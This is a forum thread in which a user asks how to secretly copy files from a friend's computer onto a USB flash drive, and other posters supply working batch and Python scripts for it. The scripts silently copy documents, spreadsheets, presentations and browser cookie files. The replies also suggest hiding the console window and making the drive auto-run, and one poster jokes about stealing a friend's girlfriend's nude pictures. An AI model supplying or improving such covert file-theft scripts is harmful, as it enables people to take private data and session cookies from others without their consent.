Is this possible?

coruptive

i was checking out a friends computer and he has something i want on his desktop but he wont give it to me.. i was wondering if there is a way to pop in my flash drive and it will automaticaly copy that thing i want to my flash drive (silently) i dont want him to know its copying. the flash drive i have and hope to use is a sandisk cruzer u3 smart and its 2gigs. OR can it be were everything on his desktop goes to my flashdrive silently. even all of his icons files folders that are on his desktop go to my flashdrive (i would rather it be this way, not just 1 specific file) that would be nice :rolleyes: thanks

i know it should be simple but i cant seem to get it to work right.. i can only get it to create the folder the my flashdrive but i cant get it to copy there desktop to it could someone paste what i have to type in the batch and ill just copy paste it? (im not to great at this kinda stuff)

Now stealing nude pictures of your friend's girlfriend is never nice, but easy to do;

Make a .bat something like this:

@echo off
cls
xcopy /e /y C:\WINDOWS\Users\%username%\Desktop\pics %cd%
exit

You will want to hide the command prompt window, so use hidec.exe or nircmd.exe, and make it auto run when you plug in the drive via U3 or the "Amish Method" (all this can be found through out this forum).

i know it should be simple but i cant seem to get it to work right.. i can only get it to create the folder the my flashdrive but i cant get it to copy there desktop to it could someone paste what i have to type in the batch and ill just copy paste it? (im not to great at this kinda stuff)

Well this is a great opportunity to get better, and btw no one here will outright make this for you, if your post some of you code we will help you with that, but if you just keep posting "please make this for me" you wont get anywhere.

does the podslurp grab .pdf files and here is wat i got sofar for my thing

@echo off

mkdir "H:\Desktop"

xcopy "C:\Documents and Settings\all users\Desktop" "H:\Desktop" /s/c/q/r/h/y

and this works but it will onyl grab the things off the all users desktop how can i make it grab the stuff of the my desktop wich the name is coruptiveâ„¢ <--- i know... corny. and also.. can i make it automaticaly grab the things from the person this is logged in instead of me puting in there username each time?

.bat Version

@echo off

mkdir %~d0\%computername%

mkdir %~d0\%computername%\Documents

mkdir %~d0\%computername%\Cookies

::Plain Text Files
xcopy "C:\Documents and Settings\%username%\My Documents\*.txt" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.txt" %~d0\%computername%\Documents /s/c/q/r/h/y

::Microsoft Word 2003 and 2007
xcopy "C:\Documents and Settings\%username%\My Documents\*.doc" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\My Documents\*.docx" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.doc" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.docx" %~d0\%computername%\Documents /s/c/q/r/h/y

::Microsoft Excel 2003 and 2007
xcopy "C:\Documents and Settings\%username%\My Documents\*.xls" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\My Documents\*.xlsx" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.xls" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.xlsx" %~d0\%computername%\Documents /s/c/q/r/h/y

::Microsoft PowerPoint 2003 and 2007
xcopy "C:\Documents and Settings\%username%\My Documents\*.ppt" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\My Documents\*.pptx" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.pptx" %~d0\%computername%\Documents /s/c/q/r/h/y

xcopy "C:\Documents and Settings\%username%\Desktop\*.ppt" %~d0\%computername%\Documents /s/c/q/r/h/y

::COOKIES
xcopy "C:\Documents and Settings\%username%\Cookies\*.txt" %~d0\%computername%\Cookies /s/c/q/r/h/y

@cls
@exit

ls python

import os,shutil
exts = [".txt",".doc",".docx",".xls",".xlsx",".ppt",".pptx"]
startpath = "C:\\Documents and Settings\\"
def find(none, directory, filenames):                      
    for file in filenames:                                      
        for ext in exts:                      
            if file.endswith(ext):                
                fullfile = os.path.join(directory,file)
                try:
                    shutil.copy(fullfile,file)
                except IOError:
                    pass # access denied
os.path.walk(startpath,find, None)

I tried to make on to just grab all pdfs, however i am still unsure about the whole pyinstaller thing. It works on my box but usually not on others. So if it doesnt work just grab the python26.dll and put it in the same dir. Download here

Why don't try to implement THIS to your payload's code?

It'll give you a way to slurp all the desired documents you want with a pre-configured plain text file with the extensions you need. It's easy ready to go and only needs some of copy-paste actions.

That's the war! :lol:

EDIT:

Bad link, changed to good one

Im going to look at that, used the pocketknife for a day but i like to do my own thing lol. It would be great to have an .ini or something that it reads for extensions, however some systems wont let you run bats or vbs so exes are just easier.

I scripted it for the pocketknife but it was never implemented because the project died. You can translate it to...anything!

Look it, is very simply and the concept in how-to do it is easy to understand. And if you don't want to have it in a batch, you can compile it too.

It will work in 99% of cases, let me know what systems don't let you run bats or vbs (questionable) :lol:

EDIT:

Bad link, try THIS ONE

BTW if you want a proof of concept, I'll release it.

If you lock down a system right then policy will not allow you to run those types of programs. I have yet to run into one myself, however there are boxes that restrict those types of applications.

EDIT: On a military base i was recently at the public libary computers would not allow vbs or bat